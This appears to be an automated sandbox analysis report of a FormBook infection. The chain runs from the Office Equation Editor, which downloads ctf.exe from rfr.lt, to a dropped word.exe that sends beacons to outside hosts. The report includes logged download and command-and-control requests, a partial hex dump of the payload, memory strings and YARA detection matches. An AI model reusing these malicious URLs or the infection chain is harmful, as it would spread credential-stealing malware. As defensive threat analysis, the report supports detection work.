Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Fri, 14 Jan 2022 07:05:05 GMT | Content-Type: application/octet-stream | Content-Length: 248302 | Last-Modified: Thu, 13 Jan 2022 11:11:05 GMT | Connection: keep-alive | ETag: "61e008c9-3c9ee" | Expires: Sun, 13 Feb 2022 07:05:05 GMT | Cache-Control: max-age=2592000 | Accept-Ranges: bytes | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic | HTTP traffic detected: GET /ctf.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: rfr.lt | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Fri, 14 Jan 2022 07:06:29 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | X-Sorting-Hat-PodId: -1 | X-Dc: gcp-europe-west1 | X-Request-ID: 99fb20a9-766c-40f0-9df4-b158c5fb1252 | X-Content-Type-Options: nosniff | X-Permitted-Cross-Domain-Policies: none | X-XSS-Protection: 1; mode=block | X-Download-Options: noopen | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 6cd5059eac695c85-FRA | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 | Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: word.exe, word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.507160581.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.673859564.0000000001CF0000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.490190068.00000000077B8000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469131172.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.479966015.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.488819431.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.507699566.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerK
          Source: explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea
          Source: explorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exeJump to behavior
          Source: unknownDNS traffic detected: queries for: rfr.lt
          Source: global trafficHTTP traffic detected: GET /ctf.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rfr.ltConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1Host: www.ponto-bras.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1Host: www.hydrogendatapower.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
